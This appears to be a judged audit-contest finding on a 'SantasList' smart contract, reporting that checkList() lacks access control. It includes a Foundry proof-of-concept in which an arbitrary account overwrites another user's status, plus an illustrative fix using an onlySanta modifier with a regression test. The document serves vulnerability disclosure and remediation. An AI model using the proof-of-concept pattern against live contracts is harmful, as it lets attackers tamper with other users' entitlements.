Submission Details
Severity: high
Valid

checkList() function can be called by anyone

Summary

According to the contest's project details, only Santa should be able to call the checkList() function.

Vulnerability Details

There is no modifier or revert check to prevent an arbitrary caller from invoking the checkList() function.

Impact

Anyone can call the checkList() function. This affects the whole logic of the contract: a user's status, whether it has been set once or twice, can be overwritten by anyone, preventing that user from collecting their NFT.

Please see PoC below:

function testCheckListFunctionCanbeCalledByAnyone() public {
    // Warp past the Christmas 2023 block time used by the contract.
    vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);
    // Santa marks `user` as NICE on both lists, as intended.
    vm.startPrank(santa);
    santasList.checkList(user, SantasList.Status.NICE);
    santasList.checkTwice(user, SantasList.Status.NICE);
    vm.stopPrank();
    // An unrelated account overwrites `user`'s first-list status to NAUGHTY.
    vm.startPrank(user2);
    santasList.checkList(user, SantasList.Status.NAUGHTY);
    vm.stopPrank();
    // `user` can no longer collect the present.
    vm.startPrank(user);
    vm.expectRevert();
    santasList.collectPresent();
    vm.stopPrank();
}

Tools Used

  • foundry

  • manual code review

Recommendations

The onlySanta modifier should be added to the checkList() function.
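The following is an added illustration of the recommended fix together with a Foundry regression test; it is not the project's SantasList contract or the submitter's code. Only checkList(address, Status), the Status members NICE and NAUGHTY, and the onlySanta modifier name come from the page; the contract name, the UNCHECKED default, the custom error, storage names, the constructor and the test addresses are assumptions made for this example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import {Test} from "forge-std/Test.sol";

/// Minimal stand-in for the audited contract (not the project's code).
contract SantasListAccessControlled {
    // UNCHECKED is a constructed default; only NICE and NAUGHTY are from the finding.
    enum Status { UNCHECKED, NICE, NAUGHTY }

    error SantasList__NotSanta(); // error name is an assumption

    address private immutable i_santa;
    mapping(address => Status) private s_theListCheckedOnce; // storage name is an assumption

    event CheckedOnce(address indexed person, Status status);

    constructor() {
        i_santa = msg.sender; // assumption: the deployer is Santa
    }

    // The check the audited checkList() lacked: every caller other than Santa
    // reverts before any state is written.
    modifier onlySanta() {
        if (msg.sender != i_santa) {
            revert SantasList__NotSanta();
        }
        _;
    }

    // Without onlySanta, any account could overwrite another person's status.
    function checkList(address person, Status status) external onlySanta {
        s_theListCheckedOnce[person] = status;
        emit CheckedOnce(person, status);
    }

    function getStatus(address person) external view returns (Status) {
        return s_theListCheckedOnce[person];
    }
}

/// Regression test: a non-Santa caller must not be able to change a status.
contract SantasListAccessControlledTest is Test {
    SantasListAccessControlled private santasList;
    address private santa = makeAddr("santa");   // constructed test address
    address private user = makeAddr("user");     // constructed test address
    address private user2 = makeAddr("user2");   // constructed test address

    function setUp() public {
        vm.prank(santa);
        santasList = new SantasListAccessControlled();
    }

    function testOnlySantaCanCheckList() public {
        // Santa's call succeeds and is recorded.
        vm.prank(santa);
        santasList.checkList(user, SantasListAccessControlled.Status.NICE);
        assertEq(
            uint256(santasList.getStatus(user)),
            uint256(SantasListAccessControlled.Status.NICE)
        );

        // The same overwrite attempted in the PoC now reverts with the custom error
        // and leaves the stored status untouched.
        vm.prank(user2);
        vm.expectRevert(SantasListAccessControlled.SantasList__NotSanta.selector);
        santasList.checkList(user, SantasListAccessControlled.Status.NAUGHTY);
        assertEq(
            uint256(santasList.getStatus(user)),
            uint256(SantasListAccessControlled.Status.NICE)
        );
    }
}
```

Run with `forge test --match-contract SantasListAccessControlledTest`. Using a custom error in the modifier keeps the revert cheap and lets the test assert on the exact selector rather than a bare `vm.expectRevert()`, so an unrelated revert cannot make the test pass by accident.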

Updates

Lead Judging Commences

inallhonesty Lead Judge almost 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

Access Control on checkList()

Anyone is able to call checkList() changing the status of a provided address. This is not intended functionality and is meant to be callable by only Santa.
